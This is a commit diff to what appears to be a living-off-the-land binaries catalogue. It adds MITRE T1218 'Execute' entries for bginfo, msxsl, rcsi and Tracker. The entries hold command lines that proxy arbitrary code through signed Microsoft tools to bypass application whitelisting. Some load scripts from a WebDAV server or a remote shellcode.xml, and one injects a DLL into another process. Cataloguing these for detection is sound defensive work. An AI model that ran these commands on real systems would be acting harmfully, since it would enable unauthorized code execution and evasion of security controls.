Adding 'Execute' categories to existing 'AWL Bypass' binaries.

yml/OtherMSBinaries/Bginfo.yml

@@ -4,6 +4,14 @@ Description: Background Information Utility included with SysInternals Suite
 Author: 'Oddvar Moe'
 Created: '2018-05-25'
 Commands:
+  - Command: bginfo.exe bginfo.bgi /popup /nolicprompt
+    Description: Execute VBscript code that is referenced within the bginfo.bgi file.
+    Usecase: Local execution of VBScript
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
   - Command: bginfo.exe bginfo.bgi /popup /nolicprompt
     Description: Execute VBscript code that is referenced within the bginfo.bgi file.
     Usecase: Local execution of VBScript
@@ -12,6 +20,14 @@ Commands:
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
+  - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
+    Usecase: Remote execution of VBScript
+    Description: Execute bginfo.exe from a WebDAV server.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
   - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
     Usecase: Remote execution of VBScript
     Description: Execute bginfo.exe from a WebDAV server.
@@ -20,6 +36,14 @@ Commands:
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
+  - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
+    Usecase: Remote execution of VBScript
+    Description: This style of execution may not longer work due to patch.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
   - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
     Usecase: Remote execution of VBScript
     Description: This style of execution may not longer work due to patch.
@@ -39,4 +63,4 @@ Resources:
 Acknowledgement:
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OtherMSBinaries/Msxsl.yml

@@ -4,6 +4,14 @@ Description: Command line utility used to perform XSL transformations.
 Author: 'Oddvar Moe'
 Created: '2018-05-25'
 Commands:
+  - Command: msxsl.exe customers.xml script.xsl
+    Description: Run COM Scriptlet code within the script.xsl file (local).
+    Usecase: Local execution of script stored in XSL file.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
   - Command: msxsl.exe customers.xml script.xsl
     Description: Run COM Scriptlet code within the script.xsl file (local).
     Usecase: Local execution of script stored in XSL file.
@@ -12,6 +20,14 @@ Commands:
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
+  - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
+    Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
+    Usecase: Local execution of remote script stored in XSL script stored as an XML file.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
   - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
     Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
     Usecase: Local execution of remote script stored in XSL script stored as an XML file.

yml/OtherMSBinaries/Rcsi.yml

@@ -4,6 +4,14 @@ Description: Non-Interactive command line inerface included with Visual Studio.
 Author: 'Oddvar Moe'
 Created: '2018-05-25'
 Commands:
+  - Command: rcsi.exe bypass.csx
+    Description: Use embedded C# within the csx script to execute the code.
+    Usecase: Local execution of arbitrary C# code stored in local CSX file.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
   - Command: rcsi.exe bypass.csx
     Description: Use embedded C# within the csx script to execute the code.
     Usecase: Local execution of arbitrary C# code stored in local CSX file.
@@ -23,4 +31,4 @@ Resources:
 Acknowledgement:
   - Person: Matt Nelson
     Handle: '@enigma0x3'
----
+---

yml/OtherMSBinaries/Tracker.yml

@@ -4,6 +4,14 @@ Description: Tool included with Microsoft .Net Framework.
 Author: 'Oddvar Moe'
 Created: '2018-05-25'
 Commands:
+  - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
+    Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
+    Usecase: Injection of locally stored DLL file into target process.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
   - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
     Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
     Usecase: Injection of locally stored DLL file into target process.